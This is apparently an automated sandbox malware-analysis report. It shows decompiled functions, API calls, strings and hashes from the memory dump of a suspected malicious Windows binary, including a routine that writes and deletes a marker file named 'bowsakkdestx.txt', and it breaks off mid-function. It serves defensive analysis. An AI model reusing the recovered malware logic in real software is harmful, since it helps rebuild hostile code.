0x0041426e
0x0041426f
0x00414273
0x00414277
0x0041427a
0x0041427c
0x0041427c
0x0041427e
0x00414281
0x00414178
0x00414178
0x0041417f
0x0041417f
0x0041418a
0x00414256
0x0041425b
0x00000000
0x00414190
0x00414192
0x0041419d
0x004141a0
0x004141aa
0x004141b0
0x004141b6
0x004141bf
0x004141b8
0x004141ba
0x004141ba
0x004141c5
0x004141cb
0x004141c7
0x004141c7
0x004141c7
0x004141d0
0x004141d3
0x004141d5
0x004141e4
0x004141e9
0x004141ec
0x004141ec
0x004141f1
0x0041421c
0x00414220
0x00414222
0x00414222
0x00414224
0x00414228
0x0041422e
0x0041422a
0x0041422a
0x0041422a
0x00414230
0x00414232
0x00414235
0x00414239
0x00000000
0x00414239
0x004141f3
0x004141f3
0x004141f9
0x004141ff
0x004141fb
0x004141fb
0x004141fb
0x00414204
0x0041420a
0x00414206
0x00414206
0x00414206
0x0041420e
0x00414215
0x0041423e
0x0041423e
0x0041420e
0x00414246
0x00414246
0x004141aa
0x00414253
0x00414253
0x0041418a

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

string too long, xrefs: 00414256
invalid string position, xrefs: 00414260

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0045AD50(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t17;
				intOrPtr _t18;
				signed int _t36;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr _t46;

				_t48 = __ebp;
				_t1 =  &_a8; // 0x463743
				_t46 =  *_t1;
				_t2 =  &_a4; // 0x463743
				_t45 =  *_t2;
				_t39 =  *_t45;
				if( *_t45 >= _t46) {
					L3:
					 *_t45 = _t46;
					return _t46;
				} else {
					if( *(_t45 + 8) < _t46) {
						__eflags = _t46 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t17 =  *((intOrPtr*)(_t45 + 4));
							_push(__ebx);
							_t36 = 0xaaaaaaab * (_t46 + 3) >> 0x20 >> 1 << 2;
							__eflags = _t17;
							if(_t17 != 0) {
								_t18 = E00454F30(_t17, _t36, ".\\crypto\\buffer\\buffer.c", 0x7b);
							} else {
								_t18 = E00454E50(_t36, ".\\crypto\\buffer\\buffer.c", 0x79);
							}
							_t44 = _t18;
							__eflags = _t44;
							if(__eflags != 0) {
								__eflags = _t46 -  *_t45;
								 *((intOrPtr*)(_t45 + 4)) = _t44;
								 *(_t45 + 8) = _t36;
								E0042B420( *_t45 + _t44, 0, _t46 -  *_t45);
								 *_t45 = _t46;
								return _t46;
							} else {
								E004512D0(_t36, _t44, _t45, _t48, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x7e);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t45, __ebp, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x74);
							__eflags = 0;
							return 0;
						}
					} else {
						E0042B420( *((intOrPtr*)(_t45 + 4)) + _t39, 0, _t46 - _t39);
						goto L3;
					}
				}
			}

0x0045ad50
0x0045ad51
0x0045ad51
0x0045ad56
0x0045ad56
0x0045ad5a
0x0045ad5e
0x0045ad7a
0x0045ad7a
0x0045ad80
0x0045ad60
0x0045ad63
0x0045ad81
0x0045ad87
0x0045adad
0x0045adb0
0x0045adb5
0x0045adb8
0x0045adba
0x0045add7
0x0045adbc
0x0045adc4
0x0045adc9
0x0045addf
0x0045ade1
0x0045ade3
0x0045ae06
0x0045ae08
0x0045ae11
0x0045ae15
0x0045ae1d
0x0045ae24
0x0045ade5
0x0045adf2
0x0045adfa
0x0045ae01
0x0045ae01
0x0045ad89
0x0045ad96
0x0045ad9e
0x0045ada2
0x0045ada2
0x0045ad65
0x0045ad72
0x00000000
0x0045ad77
0x0045ad63

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14
.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E0040C5C0(void* __ebx, char* __ecx) {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr* _v64;
				char _v72;
				intOrPtr _v76;
				void* __edi;
				char* _t19;
				intOrPtr _t24;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t38;
				void* _t39;
				void* _t42;
				char* _t43;

				_t31 = __ebx;
				_t19 =  &_v44;
				_v48 = 0;
				_t43 = __ecx;
				__imp__UuidCreate(_t19, _t39, _t42);
				if(_t19 != 0) {
					L9:
					_push(0x24);
					 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t43 + 0x10)) = 0;
					 *_t43 = 0;
					E004156D0(_t31, _t43, _t39, "8a4577dc-de55-4eb5-b48a-8a3eee60cd95");
					goto L10;
				} else {
					_v56 = _t19;
					__imp__UuidToStringA( &_v48,  &_v56);
					_t38 = _v64;
					if(_t38 == 0) {
						goto L9;
					} else {
						_v20 = 0xf;
						_v24 = 0;
						_v40 = 0;
						if( *_t38 != 0) {
							_t34 = _t38;
							_t39 = _t34 + 1;
							do {
								_t24 =  *_t34;
								_t34 = _t34 + 1;
							} while (_t24 != 0);
							_t35 = _t34 - _t39;
						} else {
							_t35 = 0;
						}
						E004156D0(_t31,  &_v40, _t39, _t38);
						__imp__RpcStringFreeA( &_v72, _t35);
						_v76 = 0;
						E00412CA0(_t43,  &_v52);
						if(_v36 < 0x10) {
							L10:
							return _t43;
						} else {
							L00422587(_v48);
							return _t43;
						}
					}
				}
			}

0x0040c5c0
0x0040c5cb
0x0040c5cf
0x0040c5d8
0x0040c5da
0x0040c5e2
0x0040c675
0x0040c675
0x0040c677
0x0040c680
0x0040c68c
0x0040c68f
0x00000000
0x0040c5e8
0x0040c5e8
0x0040c5f6
0x0040c5fc
0x0040c602
0x00000000
0x0040c604
0x0040c604
0x0040c60c
0x0040c614
0x0040c61c
0x0040c622
0x0040c624
0x0040c627
0x0040c627
0x0040c629
0x0040c62a
0x0040c62e
0x0040c61e
0x0040c61e
0x0040c61e
0x0040c636
0x0040c640
0x0040c64a
0x0040c655
0x0040c65f
0x0040c694
0x0040c69b
0x0040c661
0x0040c665
0x0040c674
0x0040c674
0x0040c65f
0x0040c602

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 91a0ca722913679a247c074017a0937e9be0a0ec6b7fa287bef5fb0b650ed4ae
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 91a0ca722913679a247c074017a0937e9be0a0ec6b7fa287bef5fb0b650ed4ae
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Uniqueness

Uniqueness Score: -1.00%

Function 00437A2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00437A2D(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(E0043884E(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E0043884E(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x00437a31
0x00437a36
0x00437a5e
0x00000000
0x00437a8c
0x00437a7e
0x00437aaf
0x00000000
0x00437aaf
0x00000000
0x00437a80
0x00437aad
0x00000000
0x00000000
0x00437ab3
0x00437ab8
0x00437abc
0x00437abc
0x00437a85

APIs

_wcscmp.LIBCMT ref: 00437A44
_wcscmp.LIBCMT ref: 00437A55

Strings

ACP, xrefs: 00437A3E
OCP, xrefs: 00437A4F

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040C470(void* __ebx, CHAR* __ecx, void* __edx) {
				char _v264;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t17;
				CHAR* _t18;
				void* _t20;

				_t17 = __edx;
				_t4 =  &_v264;
				_t18 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t20 = E004220B6( &_v264, "w");
					__eflags = _t20;
					if(__eflags != 0) {
						_push(_t20);
						_push(lstrlenA(_t18));
						_push(1);
						_push(_t18);
						E00422B02(__ebx, _t17, _t18, _t20, __eflags);
						_push(_t20);
						E00423A38(__ebx, _t18, _t20, __eflags);
						return 1;
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c470
0x0040c479
0x0040c489
0x0040c48b
0x0040c493
0x0040c4a9
0x0040c4c0
0x0040c4c5
0x0040c4c7
0x0040c4d1
0x0040c4d9
0x0040c4da
0x0040c4dc
0x0040c4dd
0x0040c4e2
0x0040c4e3
0x0040c4f2
0x0040c4c9
0x0040c4ca
0x0040c4d0
0x0040c4d0
0x0040c495
0x0040c49b
0x0040c49b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Uniqueness

Uniqueness Score: -1.00%

Function 004242A7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
__invoke_watson.LIBCMT ref: 004242CC

Strings

0Ow`R, xrefs: 004242B0
i;B, xrefs: 004242C9

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: DecodePointer__invoke_watson
String ID: 0Ow`R$i;B
API String ID: 4034010525-1116011043
Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA10(intOrPtr __ecx) {
				struct _WNDCLASSEXW _v52;

				_v52.cbSize = 0x30;
				_v52.style = 3;
				_v52.lpfnWndProc = E0041BAE0;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 0;
				_v52.hInstance = __ecx;
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"LPCWSTRszWindowClass";
				_v52.hIconSm = 0;
				return RegisterClassExW( &_v52);
			}

0x0041ba1d
0x0041ba24
0x0041ba2b
0x0041ba32
0x0041ba39
0x0041ba40
0x0041ba43
0x0041ba50
0x0041ba57
0x0041ba5e
0x0041ba65
0x0041ba6c
0x0041ba7c

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32 ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C420() {
				char _v264;
				CHAR* _t4;

				_t4 =  &_v264;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					return DeleteFileA( &_v264);
				}
				return _t4;
			}

0x0040c429
0x0040c438
0x0040c440
0x0040c44e
0x00000000
0x0040c45b
0x0040c464

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Uniqueness

Uniqueness Score: -1.00%

Function 00427908 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00427908(intOrPtr _a4) {
				intOrPtr _t2;

				_t2 = E00428AF7(4);
				__imp__DecodePointer( *0x510444);
				__imp__EncodePointer(_a4);
				 *0x510444 = _t2;
				E00428C81(4);
				return _t2;
			}

0x0042790e
0x0042791a
0x00427925
0x0042792d
0x00427932
0x0042793c

APIs

__lock.LIBCMT ref: 0042790E

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

DecodePointer.KERNEL32 ref: 0042791A
EncodePointer.KERNEL32(?), ref: 00427925

Part of subcall function 00428C81: LeaveCriticalSection.KERNEL32(?,00428C46,0000000A,00428C36,00507BD0,00000008,00428B0E,i;B,i;B,?,004250D7,0000000D), ref: 00428C8E

Strings

0Ow`R, xrefs: 0042791A

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CriticalPointerSection$DecodeEncodeEnterLeave__lock__mtinitlocknum
String ID: 0Ow`R
API String ID: 2625109469-1688033838
Opcode ID: b96d3330f69780de5e94f0a7477cc2ac5a9ca5dabebc68f4c0891483ae9c0b78
Instruction ID: a7f293a9869467cd648e1b6588198978681150ad1574794750a712bc614af536
Opcode Fuzzy Hash: b96d3330f69780de5e94f0a7477cc2ac5a9ca5dabebc68f4c0891483ae9c0b78
Instruction Fuzzy Hash: C2D05B72A412146BDE402BE5FC4E9883F58D714761F00406BF70CC61A1DEF54840979D

Uniqueness

Uniqueness Score: -1.00%

Function 00427C2E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00427C2E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {

				_t15 = __eflags;
				E00427F51(__ebx, __edx, __edi, __esi, __eflags);
				_t1 =  &_a4; // 0x423b69
				E00427FAE(__ebx, __edx, __edi, __esi,  *_t1);
				E00427CEC(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E00427E0E(__ebx, __edi, __esi, _t15);
			}

0x00427c2e
0x00427c31
0x00427c36
0x00427c39
0x00427c44
0x00427c49
0x00427c4a
0x00427c4c
0x00427c4e
0x00427c58

APIs

__FF_MSGBANNER.LIBCMT ref: 00427C31

Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82

__NMSG_WRITE.LIBCMT ref: 00427C39

Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE

Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6

_doexit.LIBCMT ref: 00427C50

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Strings

i;B, xrefs: 00427C36

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
String ID: i;B
API String ID: 2447380256-472376889
Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040ECB0(intOrPtr* __ecx, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				char* _t82;
				intOrPtr _t85;
				intOrPtr _t99;
				intOrPtr* _t112;
				signed int _t116;
				intOrPtr* _t122;
				void* _t123;
				char* _t129;
				char* _t132;
				intOrPtr _t134;
				intOrPtr* _t136;
				intOrPtr _t138;
				void* _t139;

				_push(0xffffffff);
				_push(0x4caa30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t138;
				_t139 = _t138 - 0x28;
				_push(_t132);
				_t136 = __ecx;
				_v8 = 0;
				_t82 = 0;
				_t112 = 0;
				_v20 = 0;
				if( &_v32 != __ecx) {
					_t82 =  *__ecx;
					 *__ecx = 0;
					_t112 =  *((intOrPtr*)(__ecx + 4));
					 *((intOrPtr*)(__ecx + 4)) = 0;
					_v20 = _t82;
					 *((intOrPtr*)(__ecx + 8)) = 0;
				}
				_v8 = 1;
				if(_t82 == 0) {
					L10:
					if(_a20 == 0) {
						L39:
						if(_a24 >= 0x10) {
							_t82 = L00422587(_a4);
							_t139 = _t139 + 4;
						}
						_a24 = 0xf;
						_a20 = 0;
						_a4 = 0;
						if(_a48 >= 0x10) {
							_t82 = L00422587(_a28);
						}
						 *[fs:0x0] = _v16;
						return _t82;
					}
					_t121 =  >=  ? _a28 :  &_a28;
					_push( >=  ? _a28 :  &_a28);
					_t84 =  >=  ? _a4 :  &_a4;
					_push( >=  ? _a4 :  &_a4);
					_t82 = E00421B3B();
					_t129 = _t82;
					_t139 = _t139 + 8;
					if(_t129 == 0) {
						goto L39;
					}
					do {
						_v36 = 0xf;
						_v40 = 0;
						_v56 = 0;
						if( *_t129 != 0) {
							_t122 = _t129;
							_t23 = _t122 + 1; // 0x1
							_t132 = _t23;
							do {
								_t85 =  *_t122;
								_t122 = _t122 + 1;
							} while (_t85 != 0);
							_t123 = _t122 - _t132;
							L18:
							_push(_t123);
							_t124 =  &_v56;
							E004156D0(_t112,  &_v56, _t132, _t129);
							_v8 = 3;
							_t134 =  *((intOrPtr*)(_t136 + 4));
							if( &_v56 >= _t134) {
								L28:
								if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
									E00415230(_t112, _t136, _t134, _t124);
								}
								_t132 =  *((intOrPtr*)(_t136 + 4));
								if(_t132 != 0) {
									 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t132 + 0x10)) = 0;
									 *_t132 = 0;
									if(_v36 >= 0x10) {
										 *_t132 = _v56;
										_v56 = 0;
									} else {
										_t95 = _v40 + 1;
										if(_v40 + 1 != 0) {
											E004205A0(_t132,  &_v56, _t95);
											_t139 = _t139 + 0xc;
										}
									}
									 *((intOrPtr*)(_t132 + 0x10)) = _v40;
									 *((intOrPtr*)(_t132 + 0x14)) = _v36;
									_v36 = 0xf;
									_v40 = 0;
									_v56 = 0;
								}
								goto L36;
							}
							_t99 =  *_t136;
							_t124 =  &_v56;
							if(_t99 > _t124) {
								goto L28;
							}
							_t126 = _t124 - _t99;
							_t116 = (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2);
							if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
								E00415230(_t116, _t136, _t134, _t126);
							}
							_t112 =  *((intOrPtr*)(_t136 + 4));
